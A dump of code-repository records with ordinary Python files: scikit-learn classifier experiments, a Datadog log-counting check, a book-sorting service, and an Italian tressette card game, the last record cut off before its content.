marker='')\n# for i in range(3):\n# plt.bar(algorithms[i], pen_error[i])\n# plt.title('Error Rate vs Leaf Size') \n# plt.xlabel('Leaf Size') \n# plt.ylabel('Error')\n# plt.show()\n# plt.figure(figsize=(12, 6))\n# plt.plot(leafsize, sat_error, color='red', linestyle='solid', marker='')\n# for i in range(3):\n# plt.bar(algorithms[i], sat_error[i])\n# plt.title('Error Rate vs Leaf Size') \n# plt.xlabel('Leaf Size') \n# plt.ylabel('Error')\n# plt.show()\n\n# from sklearn.metrics import classification_report, confusion_matrix\n# print(confusion_matrix(y_test_sat, y_pred_sat))\n# print(confusion_matrix(y_test_pen, y_pred_pen))\n# print(classification_report(y_test_sat, y_pred_sat))\n# print(classification_report(y_test_pen, y_pred_pen))"
},
{
"alpha_fraction": 0.7090961337089539,
"alphanum_fraction": 0.7205377817153931,
"avg_line_length": 36.9782600402832,
"blob_id": "26f0310cce5151443c3ad9542aac5adfae52c53f",
"content_id": "050df0ef0e5bc0da8b76b44820c36078dbdfe74c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3496,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 92,
"path": "/src/decision_tree.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://stackabuse.com/decision-trees-in-python-with-scikit-learn/\n\nimport pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt\nfrom sklearn import metrics \nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\npen_train_error = []\npen_test_error = []\nsat_train_error = []\nsat_test_error = []\nsat_accuracy = []\npen_accuracy = []\n\nfrom sklearn.tree import DecisionTreeClassifier \nmax_depth_list = np.linspace(2, 50, 49, endpoint=True)\n\nsat_classifier = DecisionTreeClassifier(max_depth=10, min_samples_split=10)\npen_classifier = DecisionTreeClassifier(max_depth=15, min_samples_split=2) \nsatT1 = time.time() \nsat_classifier.fit(X_train_sat, y_train_sat)\nsatT2 = time.time()\npenT1 = time.time()\npen_classifier.fit(X_train_pen, y_train_pen)\npenT2 = time.time()\n\n# print(satT2-satT1)\n# print(penT2-penT1)\n\ny_pred_sat_test = sat_classifier.predict(X_test_sat)\ny_pred_pen_test = pen_classifier.predict(X_test_pen)\n\npen_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen_test))\nsat_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat_test))\n\npen_test_error = [1 - accuracy for accuracy in pen_accuracy]\nsat_test_error = [1 - accuracy for accuracy in sat_accuracy]\n\nprint(pen_test_error)\nprint(sat_test_error)\n \n# plt.figure(figsize=(12, 6)) \n# plt.plot(max_depth_list, pen_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# plt.title('Error Rate vs Minimum Samples to Split Internal Node') \n# plt.xlabel('Minimum Samples') \n# plt.ylabel('Error')\n# plt.show()\n# plt.figure(figsize=(12, 6))\n# plt.plot(max_depth_list, sat_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# plt.title('Error Rate vs Minimum Samples to Split Internal Node') \n# plt.xlabel('Minimum Samples') \n# plt.ylabel('Error')\n# plt.show()\n\n# from sklearn.metrics import classification_report, confusion_matrix\n# print(confusion_matrix(y_test_sat, y_pred_sat))\n# print(confusion_matrix(y_test_pen, y_pred_pen))\n# print(classification_report(y_test_sat, y_pred_sat))\n# print(classification_report(y_test_pen, y_pred_pen))\n\n# from sklearn import metrics \n# print('Sat Mean Absolute Error:', metrics.mean_absolute_error(y_test_sat, y_pred_sat)) \n# print('Sat Mean Squared Error:', metrics.mean_squared_error(y_test_sat, y_pred_sat)) \n# print('Sat Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test_sat, y_pred_sat))) \n# print('Pen Mean Absolute Error:', metrics.mean_absolute_error(y_test_pen, y_pred_pen)) \n# print('Pen Mean Squared Error:', metrics.mean_squared_error(y_test_pen, y_pred_pen)) \n# print('Pen Root Mean Squared Error:', 
np.sqrt(metrics.mean_squared_error(y_test_pen, y_pred_pen))) \n"
},
{
"alpha_fraction": 0.7069175839424133,
"alphanum_fraction": 0.7198117971420288,
"avg_line_length": 38.86111068725586,
"blob_id": "3c5d89d95196bb10395158597b65ec9d09ab7489",
"content_id": "e9f53396d4e7ec6510f4bc231a9280087c9a5ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5739,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 144,
"path": "/src/boosting.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://machinelearningmastery.com/ensemble-machine-learning-algorithms-python-scikit-learn/\n#https://www.datacamp.com/community/tutorials/parameter-optimization-machine-learning-models\n#https://www.datacamp.com/community/tutorials/adaboost-classifier-python\n\nimport pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt \nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import SVC \nfrom sklearn import model_selection, metrics\nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\n# sat_num_rows = satdata.index._stop\n# pen_num_rows = pendata.index._stop\n\n# pen_x = []\n# sat_x = []\n# pen_test_error = []\n# sat_test_error = []\n\n\n\n# sat_num_items = int(sat_num_rows*i*.05)\n# pen_num_items = int(pen_num_rows*i*.05)\n# pen_x.append(pen_num_items)\n# sat_x.append(sat_num_items)\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\npen_train_error = []\npen_test_error = []\npen_test_accuracy = []\nsat_train_error = []\nsat_test_error = []\nsat_test_accuracy = []\npen_train_size = []\nsat_train_size = []\n\ndatasplits = np.linspace(.05, 1.0, 20, endpoint=True) \nseed = 7\nnum_trees = 30\n#kfold = model_selection.KFold(n_splits=10, random_state=seed)\npen_model = GradientBoostingClassifier(n_estimators=num_trees, random_state=seed)\n#pen_model = MLPClassifier(hidden_layer_sizes=(10, 10, 10), max_iter=1000)\npenT1 = time.time() \npen_model.fit(X_train_pen, y_train_pen)\npenT2 = time.time()\n#pen_train_size, pen_train_score, pen_test_score = model_selection.learning_curve(\n #pen_model, X_train_pen, y_train_pen, train_sizes=datasplits, shuffle=True, cv=3,\n #scoring='accuracy')\n#y_pred_pen_train = pen_model.predict(X_train_pen)\n#y_pred_pen_test = pen_model.predict(X_test_pen)\n#pen_results = model_selection.cross_val_score(pen_model, X_train_pen, y_train_pen, cv=kfold)\n\nsat_model = GradientBoostingClassifier(n_estimators=num_trees, random_state=seed)\n#sat_model = MLPClassifier(hidden_layer_sizes=(10, 10, 10), max_iter=1000)\nsatT1 = time.time()\nsat_model.fit(X_train_sat, y_train_sat)\nsatT2 = time.time()\n#sat_train_size, sat_train_score, sat_test_score = model_selection.learning_curve(\n #sat_model, X_train_sat, y_train_sat, train_sizes=datasplits, shuffle=True, cv=3, \n #scoring='accuracy')\n#y_pred_sat_train = sat_model.predict(X_train_sat)\n#y_pred_sat_test = sat_model.predict(X_test_sat)\n#sat_results = model_selection.cross_val_score(sat_model, X_train_sat, y_train_sat, cv=kfold)\n#pen_test_accuracy.append(metrics.accuracy_score(y_test_pen, 
y_pred_pen_test))\n#sat_test_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat_test))\n\n# pen_train_error.append(metrics.mean_absolute_error(y_train_pen, y_pred_pen_train))\n# pen_test_error.append(metrics.mean_absolute_error(y_test_pen, y_pred_pen_test))\n# sat_train_error.append(metrics.mean_absolute_error(y_train_sat, y_pred_sat_train))\n# sat_test_error.append(metrics.mean_absolute_error(y_test_sat, y_pred_sat_test))\n\nprint(satT2-satT1)\nprint(penT2-penT1)\n\n# pen_train_accuracy = np.mean(pen_train_score, axis=1)\n# pen_test_accuracy = np.mean(pen_test_score, axis=1)\n# sat_train_accuracy = np.mean(sat_train_score, axis=1)\n# sat_test_accuracy = np.mean(sat_test_score, axis=1)\n\n# pen_train_error = [1 - accuracy for accuracy in pen_train_accuracy]\n# pen_test_error = [1 - accuracy for accuracy in pen_test_accuracy]\n# sat_train_error = [1 - accuracy for accuracy in sat_train_accuracy]\n# sat_test_error = [1 - accuracy for accuracy in sat_test_accuracy]\n\n# plt.figure(figsize=(12, 6)) \n# plt.plot(pen_train_size, pen_train_error, label='Training Error', color='red', linestyle='solid', marker='')\n# plt.plot(pen_train_size, pen_test_error, label='Testing Error', color='green', linestyle='dashed', marker='')\n# plt.title('Error Rate vs Training Set Size') \n# plt.xlabel('Training Set Size') \n# plt.ylabel('Error')\n# plt.legend()\n# plt.show()\n# plt.plot(sat_train_size, sat_train_error, label='Training Error', color='red', linestyle='solid', marker='')\n# plt.plot(sat_train_size, sat_test_error, label='Testing Error', color='green', linestyle='dashed', marker='')\n# plt.title('Error Rate vs Training Set Size') \n# plt.xlabel('Training Set Size') \n# plt.ylabel('Error')\n# plt.legend()\n# plt.show()\n\n# plt.figure(figsize=(12, 6)) \n# plt.plot(treenums, pen_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# plt.title('Error Rate vs Number of Estimators') \n# plt.xlabel('Number of Estimators') \n# plt.ylabel('Error')\n# plt.show()\n# plt.figure(figsize=( 12, 6))\n# plt.plot(treenums, sat_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# plt.title('Error Rate vs Number of Estimators') \n# plt.xlabel('Number of Estimators') \n# plt.ylabel('Error')\n# plt.show()\n\n#print(sat_results.mean())\n#print(pen_results.mean())\n#print(*sat_sqerror)\n#print(*pen_sqerror)"
}
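boosting.py keeps its learning-curve measurement commented out; a runnable sketch of that same model_selection.learning_curve call on synthetic data (the real script feeds in the sat/pen CSV splits and 20 size steps):

import numpy as np
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import learning_curve

X = np.random.rand(200, 4)
y = np.random.randint(0, 3, 200)

sizes, train_scores, test_scores = learning_curve(
    GradientBoostingClassifier(n_estimators=30, random_state=7),
    X, y, train_sizes=np.linspace(0.1, 1.0, 5), cv=3,
    shuffle=True, scoring='accuracy')

# Error rate is 1 - accuracy, averaged over the cross-validation folds.
train_error = 1 - train_scores.mean(axis=1)
test_error = 1 - test_scores.mean(axis=1)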
] | 5 |
rrykhlitskyy/Datadog
|
https://github.com/rrykhlitskyy/Datadog
|
4ccd84b788746d662de8eefedc8324c8e70dbaf7
|
2e96f93a2b6f6d63c6226c9d694aabbd28c8d657
|
23aeff859caf5ab0628e40f0c0e84ee5e7a8aca9
|
refs/heads/master
| 2021-07-18T14:35:41.864326 | 2017-10-24T10:56:01 | 2017-10-24T10:56:01 | 108,113,843 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6904761791229248,
"alphanum_fraction": 0.6942856907844543,
"avg_line_length": 32.90322494506836,
"blob_id": "c66f78509f666727d9e5fe2b36e8edf6361df5c7",
"content_id": "594549f12babbcfb7e1a8279b0dabc1656d19f23",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1050,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 31,
"path": "/checks.d/count.py",
"repo_name": "rrykhlitskyy/Datadog",
"src_encoding": "UTF-8",
"text": "import re\n\nfrom collections import deque\nfrom checks import AgentCheck\n\nclass LogsCheck(AgentCheck):\n\tdef check(self, instance):\n\t\t\n\t\t#Load values from the instance config\n\t\tlogs = instance['logs']\n\t\tdefault_lines_check = self.init_config.get('default_lines_check', 100)\n\t\tlines_check = float(instance.get('lines_check', default_lines_check))\n\t\tdefault_regex = self.init_config.get('default_regex', 'error')\n\t\tregex = str(instance.get('regex', default_regex))\n\t\tdefault_metric_name = self.init_config.get('default_metric_name', 'mml.logs.error_counter')\n\t\tmetric_name = str(instance.get('metric_name', default_metric_name))\n\t\tdefault_tag = self.init_config.get('default_tag', [])\n\t\ttag = instance.get('tag', default_tag)\n\n\t\t#Get count result\n\t\tcount_list =[]\n\t\twith open(logs) as file:\n\t\t\tfor line in deque(file, lines_check):\n\t\t\t\tx = re.search(regex, line, re.IGNORECASE)\n\t\t\t\tif x != None:\n\t \t\t\t\tcount_list.append(x.group(0))\n\t\tcount = len(count_list)\n\t\tself.gauge(metric_name, count, tags=tag)\n\nif __name__ == '__main__':\n check.check(instance)"
}
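The check above tails the log by passing the open file straight into a bounded deque (only the last lines_check lines survive in memory), then counts case-insensitive regex hits. The same logic as a standalone function (the path and defaults are placeholders; note deque's maxlen must be an int, so the float the check reads from its YAML config is worth casting):

import re
from collections import deque

def count_matches(log_path, pattern='error', lines_check=100):
    with open(log_path) as f:
        tail = deque(f, maxlen=int(lines_check))  # keep only the last N lines
    return sum(1 for line in tail if re.search(pattern, line, re.IGNORECASE))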
] | 1 |
k018c1072/Task08
|
https://github.com/k018c1072/Task08
|
21f58a169788b8924ce69042766d5d0a0ea370ea
|
7ec5b104d3dcc79e9f2774d5783a77ac633d5c58
|
28176d5b1faa406752379eb4afa369ec7347b710
|
refs/heads/master
| 2022-10-04T20:00:47.545325 | 2020-06-08T04:53:55 | 2020-06-08T04:53:55 | 270,531,896 | 0 | 0 | null | 2020-06-08T04:47:07 | 2020-06-08T04:48:23 | 2020-06-08T04:53:56 | null |
[
{
"alpha_fraction": 0.4761904776096344,
"alphanum_fraction": 0.5,
"avg_line_length": 15.800000190734863,
"blob_id": "741c87cd8ff03cb6b2e7e730231e1ea5a89ce82b",
"content_id": "c2097678ddb3e08a4cab6e4a0bf1fcc46c532a2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 98,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 5,
"path": "/Exam-8_2.py",
"repo_name": "k018c1072/Task08",
"src_encoding": "UTF-8",
"text": "value = int(input('入力> '))\nif value % 2 == 0:\n print('偶数')\nelse:\n print('奇数')\n"
},
{
"alpha_fraction": 0.3333333432674408,
"alphanum_fraction": 0.5,
"avg_line_length": 10,
"blob_id": "4b94e5275201db7ca5ad00e35b0519cb6aeefb73",
"content_id": "ae97fe6706ffb697f422e57c71240393296be9f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 1,
"path": "/README.md",
"repo_name": "k018c1072/Task08",
"src_encoding": "UTF-8",
"text": "\"# Task08\" \n"
},
{
"alpha_fraction": 0.508474588394165,
"alphanum_fraction": 0.5423728823661804,
"avg_line_length": 18.66666603088379,
"blob_id": "1ca8b3e91f6ee0e6a23446c55cbcb467b66668c1",
"content_id": "135195caca4f81cef140640be3bf947acae38409",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 71,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 3,
"path": "/Exam-8_1.py",
"repo_name": "k018c1072/Task08",
"src_encoding": "UTF-8",
"text": "value = int(input('入力> '))\nif value < 20:\n print('未成年')\n"
}
] | 3 |
lutielo/SortingService
|
https://github.com/lutielo/SortingService
|
7b8a43d62c4d4fc28666bc9b8b18745e3672e711
|
66e6c96d21ff3ffbce04b1a78a67e3ec51f64e45
|
3387ad4f08852555171c9fdabb296470e26ca5c7
|
refs/heads/master
| 2021-01-12T06:04:28.590126 | 2016-12-26T16:42:32 | 2016-12-26T16:42:32 | 77,242,591 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7697368264198303,
"alphanum_fraction": 0.7697368264198303,
"avg_line_length": 32.88888931274414,
"blob_id": "752890926cf4a4b8a1d8c986d361f2d5b6950027",
"content_id": "c8afb30a9a5860c912cd2a1cf57387183962b4cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 9,
"path": "/SortingService.py",
"repo_name": "lutielo/SortingService",
"src_encoding": "UTF-8",
"text": "from SortingServiceException import SortingServiceException\nfrom operator import attrgetter\n\n\ndef sort(books, attribute, direction):\n try:\n return sorted(books, key=attrgetter(attribute), reverse=direction)\n except TypeError:\n raise SortingServiceException(\"A set of books is needed\")"
},
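sort() above is a thin wrapper over sorted() with an attrgetter key, and the scenarios in Teste.py below chain it, relying on the fact that Python's sort is stable: sorting by the secondary key first and the primary key last yields a multi-key ordering. A compact demonstration (the sample values are made up):

from operator import attrgetter

class Book(object):
    def __init__(self, title, author):
        self.title = title
        self.author = author

books = [Book('B', 'X'), Book('A', 'X'), Book('A', 'Y')]
books = sorted(books, key=attrgetter('title'), reverse=True)    # secondary key
books = sorted(books, key=attrgetter('author'), reverse=False)  # primary key
print([(b.author, b.title) for b in books])
# [('X', 'B'), ('X', 'A'), ('Y', 'A')]: authors ascending, and within each
# author the titles keep their descending order thanks to sort stability.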
{
"alpha_fraction": 0.8039215803146362,
"alphanum_fraction": 0.8039215803146362,
"avg_line_length": 24.5,
"blob_id": "cb2cc3a28acd0be6b2840cef15ec53efbf8e4b19",
"content_id": "5a425deffc2b10e54763246370f59f1aa454b1ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 2,
"path": "/SortingServiceException.py",
"repo_name": "lutielo/SortingService",
"src_encoding": "UTF-8",
"text": "class SortingServiceException(Exception):\n pass\n"
},
{
"alpha_fraction": 0.6279844641685486,
"alphanum_fraction": 0.6446418762207031,
"avg_line_length": 23.02666664123535,
"blob_id": "db05030332023c3a22ff9becf40c8aacb3032223",
"content_id": "6fccc68e4e08ef85df3ddaefdf611cfafc7a11fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1801,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 75,
"path": "/Teste.py",
"repo_name": "lutielo/SortingService",
"src_encoding": "UTF-8",
"text": "import SortingService\n\nascending = False\ndescending = True\n\ntitle = 'title'\nauthor = 'author'\nyear = 'year'\n\n\nclass Book:\n def __init__(self, index, title, author, year):\n self.index = index\n self.title = title\n self.author = author\n self.year = year\n\nbooks = [\n Book(1, 'Java How to Program', 'Deitel & Deitel', 2007),\n Book(2, 'Patterns of Enterprise Application Architecture', 'Martin Fwoler', 2002),\n Book(3, 'Head First Design Patterns', 'Elisabeth Freeman', 2004),\n Book(4, 'Internet & WWW: How to Program', 'Deitel & Deitel', 2007),\n]\n\nbooks_empty = []\n\nbooks_null = None\n\n\ndef print_sorted_books(sorted_books):\n for book in sorted_books:\n print book.index\n print book.title\n print book.author\n print book.year\n print('')\n\n\ndef scenario1():\n sorted_books = SortingService.sort(books, title, ascending)\n print_sorted_books(sorted_books)\n\n\ndef scenario2():\n sorted_books = SortingService.sort(books, title, descending)\n sorted_books = SortingService.sort(sorted_books, author, ascending)\n print_sorted_books(sorted_books)\n\n\ndef scenario3():\n sorted_books = SortingService.sort(books, title, ascending)\n sorted_books = SortingService.sort(sorted_books, author, descending)\n sorted_books = SortingService.sort(sorted_books, year, descending)\n print_sorted_books(sorted_books)\n\n\ndef scenario4():\n sorted_books = SortingService.sort(books_null, title, ascending)\n print_sorted_books(sorted_books)\n\n\ndef scenario5():\n sorted_books = SortingService.sort(books_empty, title, ascending)\n print_sorted_books(sorted_books)\n\n\nscenario1()\nprint('--------------------')\nscenario2()\nprint('--------------------')\nscenario3()\nprint('--------------------')\nscenario4()\nprint('--------------------')\nscenario5()"
},
{
"alpha_fraction": 0.7118644118309021,
"alphanum_fraction": 0.7231638431549072,
"avg_line_length": 28.5,
"blob_id": "3e47c06cb696456277686543b5b9adde574da12e",
"content_id": "a3dfce28ebf1c1502fa04e5694181f9d04dc802e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 354,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 12,
"path": "/README.md",
"repo_name": "lutielo/SortingService",
"src_encoding": "UTF-8",
"text": "# SortingService\n\n### Setup instructions\n\n- You'll need the version 2.7 or higher of Python language. If not installed, follow the steps in this page http://tecadmin.net/install-python-2-7-on-ubuntu-and-linuxmint/! \n- Fork this project\n\n### Run commands\n\n- cd [ dir ] - Where [dir] is the directory you forked the project\n- python \"Teste.py\"\n- Enjoy it!\n"
}
] | 4 |
Enucatl/tressette
|
https://github.com/Enucatl/tressette
|
bdf7cbf1761f9f0159b8ac6593724461803f87dd
|
94535889ca1d236bffcc5de0f2173766764e0875
|
dd900effab3020c9c393c5f2a20814e833926edf
|
refs/heads/master
| 2020-09-30T15:16:53.171804 | 2018-11-02T11:51:37 | 2018-11-02T11:51:37 | 73,509,867 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6521739363670349,
"alphanum_fraction": 0.6837944388389587,
"avg_line_length": 15.866666793823242,
"blob_id": "1997351c9f270c018096d2c34c2b93b436ea8ef5",
"content_id": "78e5b62dda00586ae050b249a569cb4741807d87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 253,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 15,
"path": "/programma/analisi.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding=utf-8\n\nfrom __future__ import division, print_function\n\nfrom ROOT import TH1F\n\ninput = open('punteggi')\n\nhist = TH1F(\"punteggi\", \"punteggi\", 11, 0, 11)\nfor line in input:\n hist.Fill(float(line))\n\nhist.Draw()\nraw_input()\n"
},
{
"alpha_fraction": 0.5595829486846924,
"alphanum_fraction": 0.5675272941589355,
"avg_line_length": 34.80356979370117,
"blob_id": "d359db3fe058b68ca309b979dd406ef2266c7785",
"content_id": "0cc09e81f1135655a717b17dcae35910fd9e0721",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2019,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 56,
"path": "/programma/giocatore.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\n\nimport carta\nimport random\n\ndef trova_battuta(carte_giocate):\n num_battuta = 0\n for battuta in carte_giocate:\n for c in battuta:\n #try:\n # c + 1\n #except TypeError:\n # return num_battuta\n if not isinstance(c, carta.Carta):\n return num_battuta\n num_battuta += 1\n return -1\n\nclass Giocatore(object):\n\n def __init__(self, carte_in_mano, squadra):\n #per carte_in_mano si intende una lista di oggetti Carta\n self.carte_in_mano = sorted(carte_in_mano, carta.ordine_convenzionale)\n self.squadra = squadra\n self.carte_in_mano\n\n def gioca_carta(self, carte_giocate=0):\n num_battuta_in_corso = trova_battuta(carte_giocate)\n battuta_in_corso = carte_giocate[num_battuta_in_corso]\n battuta_in_corso = enumerate(battuta_in_corso)\n battuta_in_corso = [c for c in battuta_in_corso if isinstance(c[1],\n carta.Carta)]\n\n giocate_legali = []\n if not battuta_in_corso:\n #se la battuta è vuota, significa che è primo di mano, quindi\n #può giocare come preferisce\n giocate_legali = self.carte_in_mano\n else:\n comanda = 0\n for i in range(4):\n comanda = battuta_in_corso[i][1]\n if (battuta_in_corso[i - 1][0] % 4 != battuta_in_corso[i][0]\n % 4 or len(battuta_in_corso) == 1):\n break\n giocate_legali = [c for c in self.carte_in_mano\n if carta.stesso_palo(c, comanda)]\n #filtra la lista delle carte che ha in mano, essendo costretto a\n #rispondere al palo\n if not giocate_legali:\n #se non può rispondere al palo, può giocare come vuole\n giocate_legali = self.carte_in_mano\n giocata = random.choice(giocate_legali)\n\n del self.carte_in_mano[self.carte_in_mano.index(giocata)]\n return giocata\n \n"
},
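gioca_carta above depends on trova_battuta to locate the trick in progress: the function scans the 10x4 grid of plays for the first slot still holding the 0 placeholder (anything that is not a Carta) and returns that trick's index. A quick check, assuming carta.py and giocatore.py are importable:

from carta import Carta
from giocatore import trova_battuta

giocate = [[Carta(0), Carta(5), Carta(12), Carta(30)],         # completed trick
           [Carta(7), 0, 0, 0]] + [[0] * 4 for _ in range(8)]  # in progress
print(trova_battuta(giocate))  # 1: the second trick still has empty slots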
{
"alpha_fraction": 0.5193325281143188,
"alphanum_fraction": 0.5445665717124939,
"avg_line_length": 30.5,
"blob_id": "12d082b5312d50c0729dbf7343db1c7c33dae6a4",
"content_id": "38c151bb28a2afc09365f8499637dd4cf6c69292",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2460,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 78,
"path": "/programma/carta.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\n\ndef ordine_convenzionale(x, y):\n if x.palo > y.palo:\n return 1\n elif x.palo == y.palo:\n if x > y:\n return 1\n else: return -1\n else: return -1\n\ndef stesso_palo(x, y):\n if x.palo == y.palo:\n return True\n else:\n return False\n\ndef comanda_battuta(battuta, primo_di_mano):\n \"\"\"prende la lista delle carte della battuta, vede chi è primo di mano e\n decide chi prende. Restituisce l'indice di chi ha conquistato la\n battuta\"\"\"\n comanda = battuta[primo_di_mano]\n \"\"\"ordina le carte nell'ordine in cui sono state giocate per un'iterazione più comoda:\"\"\"\n battuta_ordinata = battuta[primo_di_mano:] + battuta[:primo_di_mano]\n \"\"\"cerca la meglio\"\"\"\n for risposta in battuta_ordinata:\n if not comanda > risposta:\n comanda = risposta\n return battuta.index(comanda)\n\nclass Carta(object):\n\n def __init__(self, numero):\n self.palo = numero // 10\n self.valore = (numero % 10) + 1\n #così i valori sono da 1 a 10 e non 0-9\n valgono_uno = [2, 3, 8, 9, 10]\n valgono_tre = [1]\n if self.valore in valgono_uno:\n self.punti = 1\n elif self.valore in valgono_tre:\n self.punti = 3\n else: self.punti = 0\n\n def __repr__(self):\n diz_pali = {3:'denari', 2:'spade', 1:'coppe', 0:'bastoni'}\n diz_valori = {1:'Asso', 2:'Due', 3:'Tre', 4:'Quattro',\n 5:'Cinque', 6: 'Sei', 7: 'Sette', 8: 'Fante',\n 9: 'Cavallo', 10: 'Re'}\n return diz_valori[self.valore] + ' di ' + diz_pali[self.palo]\n\n def __gt__(self, other):\n potenza = [4, 5, 6, 7, 8, 9, 10, 1, 2, 3]\n if other.palo != self.palo:\n return True\n elif potenza.index(self.valore) > potenza.index(other.valore):\n return True\n else:\n return False\n\n def __eq__(self, other):\n if other.palo == self.palo and self.valore == other.valore:\n return True\n else: return False\n\n def __ne__(self, other):\n if other.palo != self.palo or self.valore != other.valore:\n return True\n else: return False\n\n #def __lt__(self, other):\n # potenza = [4, 5, 6, 7, 8, 9, 10, 1, 2, 3]\n # if other.palo != self.palo:\n # return True\n # elif potenza.index(self.valore) < potenza.index(other.valore):\n # return True\n # else:\n # return False\n"
},
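A minimal usage sketch of the trick-winner logic in the carta module above; the four card numbers, the leading seat, and the expected winner are illustrative assumptions, not part of the repo.

# Hypothetical example (not from the repo): resolve one trick.
# Card numbers encode suit (numero // 10) and rank (numero % 10 + 1).
import carta

battuta = [carta.Carta(5),    # seat 0: Sei di bastoni
           carta.Carta(12),   # seat 1: Tre di coppe (off suit, cannot win)
           carta.Carta(2),    # seat 2: Tre di bastoni, led the trick
           carta.Carta(9)]    # seat 3: Re di bastoni
piglia = carta.comanda_battuta(battuta, primo_di_mano=2)
print(piglia, battuta[piglia])  # 2 Tre di bastoni: the three outranks the king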
{
"alpha_fraction": 0.6601671576499939,
"alphanum_fraction": 0.6660863757133484,
"avg_line_length": 45.90163803100586,
"blob_id": "a5dd71095e55888621ee3dbe740129381c452c14",
"content_id": "5a226d799e1e79aa70586b20b2af29ec2d55f209",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2873,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 61,
"path": "/programma/passata.py",
"repo_name": "Enucatl/tressette",
"src_encoding": "UTF-8",
